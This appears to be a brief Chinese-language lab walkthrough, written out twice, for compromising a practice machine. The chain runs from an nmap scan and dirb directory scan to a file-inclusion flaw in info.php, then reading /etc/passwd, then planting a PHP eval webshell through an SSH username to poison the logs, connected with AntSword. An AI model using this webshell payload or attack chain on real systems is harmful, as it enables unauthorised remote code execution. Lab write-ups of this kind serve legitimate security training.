1.在kali用nmap扫描靶机端口
2.访问8888端口出现一个弹窗但我们并没有账号密码
3.利于dirb工具进行目录扫描
4.进入antibot_image,点击文件
5.每个文件都点开看看,发现info.php文件源代码有文件包含漏洞
6.利用漏洞读取一下etc下passwd文件
7.尝试远程连接写入木马
ssh '<?php @eval($_POST[cmd]);?>'@ip地址 -p 2211
8.尝试使用蚁剑连接
1.在kali用nmap扫描靶机端口
2.访问8888端口出现一个弹窗但我们并没有账号密码
3.利于dirb工具进行目录扫描
4.进入antibot_image,点击文件
5.每个文件都点开看看,发现info.php文件源代码有文件包含漏洞
6.利用漏洞读取一下etc下passwd文件
7.尝试远程连接写入木马
ssh '<?php @eval($_POST[cmd]);?>'@ip地址 -p 2211
8.尝试使用蚁剑连接